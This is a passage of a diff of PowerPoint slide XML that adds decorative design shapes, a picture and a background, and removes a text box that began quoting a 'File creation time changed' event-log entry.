+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="tx1">
+                <a:lumMod val="85000"/>
+                <a:lumOff val="15000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="42" name="Freeform 26">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71553909-760D-4B98-96A4-F9F48339AF6B}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="3371850" y="2692400"/>
+              <a:ext cx="3332162" cy="4165600"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="2099" h="2624">
+                  <a:moveTo>
+                    <a:pt x="2099" y="2624"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="2021" y="2624"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="2099" y="2624"/>
+                  </a:lnTo>
+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="50000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="43" name="Freeform 27">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F006A6C-F843-49BC-AC84-89BD2AF58630}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="3367088" y="2687637"/>
+              <a:ext cx="4576762" cy="4170363"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="2883" h="2627">
+                  <a:moveTo>
+                    <a:pt x="0" y="0"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="3" y="3"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="2102" y="2627"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="2883" y="2627"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="225" y="57"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="0"/>
+                  </a:lnTo>
+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="75000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="44" name="Freeform 28">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62AEE6F3-16F4-4944-8459-4D5EEA341D0D}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="2928938" y="2578100"/>
+              <a:ext cx="3584575" cy="4279900"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="2258" h="2696">
+                  <a:moveTo>
+                    <a:pt x="2258" y="2696"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="264" y="111"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="228" y="60"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="225" y="57"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="3"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="1697" y="2696"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="2258" y="2696"/>
+                  </a:lnTo>
+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="tx1">
+                <a:lumMod val="75000"/>
+                <a:lumOff val="25000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+      </p:grpSp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="52" name="Rounded Rectangle 16">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D6B9972-4A81-4223-9901-0E559A1D5E59}"/>
+              </a:ext>
+              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="656693" y="648931"/>
+            <a:ext cx="6854433" cy="5231964"/>
+          </a:xfrm>
+          <a:prstGeom prst="roundRect">
+            <a:avLst>
+              <a:gd name="adj" fmla="val 4834"/>
+            </a:avLst>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:schemeClr val="bg1"/>
+          </a:solidFill>
+          <a:ln w="38100">
+            <a:gradFill flip="none" rotWithShape="1">
+              <a:gsLst>
+                <a:gs pos="0">
+                  <a:schemeClr val="bg2"/>
+                </a:gs>
+                <a:gs pos="100000">
+                  <a:schemeClr val="bg2">
+                    <a:lumMod val="75000"/>
+                  </a:schemeClr>
+                </a:gs>
+              </a:gsLst>
+              <a:lin ang="5400000" scaled="0"/>
+              <a:tileRect/>
+            </a:gradFill>
+          </a:ln>
+          <a:effectLst>
+            <a:innerShdw blurRad="57150" dist="38100" dir="14460000">
+              <a:srgbClr val="000000">
+                <a:alpha val="70000"/>
+              </a:srgbClr>
+            </a:innerShdw>
+          </a:effectLst>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="23" name="Obrázek 22">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0540EF43-25E6-4FF5-AAD1-8E6F08B5FA5C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1458358" y="1011765"/>
+            <a:ext cx="5241161" cy="4546708"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="704521522"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2421473826"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -6749,6 +7347,28 @@
 <file path=ppt/slides/slide3.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
+    <p:bg>
+      <p:bgPr>
+        <a:blipFill rotWithShape="1">
+          <a:blip r:embed="rId2">
+            <a:duotone>
+              <a:schemeClr val="bg2">
+                <a:shade val="76000"/>
+                <a:satMod val="180000"/>
+              </a:schemeClr>
+              <a:schemeClr val="bg2">
+                <a:tint val="80000"/>
+                <a:satMod val="120000"/>
+                <a:lumMod val="180000"/>
+              </a:schemeClr>
+            </a:duotone>
+            <a:extLst/>
+          </a:blip>
+          <a:stretch/>
+        </a:blipFill>
+        <a:effectLst/>
+      </p:bgPr>
+    </p:bg>
     <p:spTree>
       <p:nvGrpSpPr>
         <p:cNvPr id="1" name=""/>
@@ -6763,156 +7383,906 @@
           <a:chExt cx="0" cy="0"/>
         </a:xfrm>
       </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="8" name="Obdélník 7">
+      <p:grpSp>
+        <p:nvGrpSpPr>
+          <p:cNvPr id="42" name="Group 41">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C82994BB-411B-4118-B7FA-A89CAA13C009}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C616B3DC-C165-433D-9187-62DCC0E317D3}"/>
+              </a:ext>
+              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
-          <p:cNvSpPr/>
-          <p:nvPr/>
+          <p:cNvGrpSpPr>
+            <a:grpSpLocks noGrp="1" noUngrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1"/>
+          </p:cNvGrpSpPr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
+        </p:nvGrpSpPr>
+        <p:grpSpPr>
+          <a:xfrm>
+            <a:off x="546100" y="-4763"/>
+            <a:ext cx="5014912" cy="6862763"/>
+            <a:chOff x="2928938" y="-4763"/>
+            <a:chExt cx="5014912" cy="6862763"/>
+          </a:xfrm>
+        </p:grpSpPr>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="43" name="Freeform 6">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97E1BF84-9824-4B0E-98DF-F0F7181DD062}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="3367088" y="-4763"/>
+              <a:ext cx="1063625" cy="2782888"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="670" h="1753">
+                  <a:moveTo>
+                    <a:pt x="0" y="1696"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="225" y="1753"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="670" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="430" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="1696"/>
+                  </a:lnTo>
+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="accent1"/>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="44" name="Freeform 7">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A85FA340-7392-4303-9707-A12F45A46F96}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="2928938" y="-4763"/>
+              <a:ext cx="1035050" cy="2673350"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="652" h="1684">
+                  <a:moveTo>
+                    <a:pt x="225" y="1684"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="652" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="411" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="1627"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="219" y="1681"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="225" y="1684"/>
+                  </a:lnTo>
+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="tx1">
+                <a:lumMod val="65000"/>
+                <a:lumOff val="35000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="45" name="Freeform 9">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{758A9051-2BD9-4868-8B84-344752FA2F60}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="2928938" y="2582862"/>
+              <a:ext cx="2693987" cy="4275138"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="1697" h="2693">
+                  <a:moveTo>
+                    <a:pt x="0" y="0"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="1622" y="2693"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="1697" y="2693"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="0"/>
+                  </a:lnTo>
+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="tx1">
+                <a:lumMod val="85000"/>
+                <a:lumOff val="15000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="46" name="Freeform 10">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58264C49-3539-4CBD-8F11-1106C8B8781F}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="3371850" y="2692400"/>
+              <a:ext cx="3332162" cy="4165600"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="2099" h="2624">
+                  <a:moveTo>
+                    <a:pt x="2099" y="2624"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="2021" y="2624"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="2099" y="2624"/>
+                  </a:lnTo>
+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="50000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="47" name="Freeform 11">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE862133-5C7E-4B32-9786-0B33BC51A75B}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="3367088" y="2687637"/>
+              <a:ext cx="4576762" cy="4170363"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="2883" h="2627">
+                  <a:moveTo>
+                    <a:pt x="0" y="0"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="3" y="3"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="2102" y="2627"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="2883" y="2627"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="225" y="57"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="0"/>
+                  </a:lnTo>
+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="75000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="48" name="Freeform 12">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90925F6C-DF03-4707-9176-6049F049B5AA}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="2928938" y="2578100"/>
+              <a:ext cx="3584575" cy="4279900"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="2258" h="2696">
+                  <a:moveTo>
+                    <a:pt x="2258" y="2696"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="264" y="111"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="228" y="60"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="225" y="57"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="3"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="1697" y="2696"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="2258" y="2696"/>
+                  </a:lnTo>
+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="tx1">
+                <a:lumMod val="75000"/>
+                <a:lumOff val="25000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+      </p:grpSp>
+      <p:sp useBgFill="1">
+        <p:nvSpPr>
+          <p:cNvPr id="50" name="Rectangle 49">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D4477A3-7936-4C6B-B46C-52E99531272A}"/>
+              </a:ext>
+              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1571625" y="728227"/>
-            <a:ext cx="10515600" cy="3385542"/>
+            <a:off x="0" y="0"/>
+            <a:ext cx="12192000" cy="6858000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
         </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>"File creation time changed:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>RuleName</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
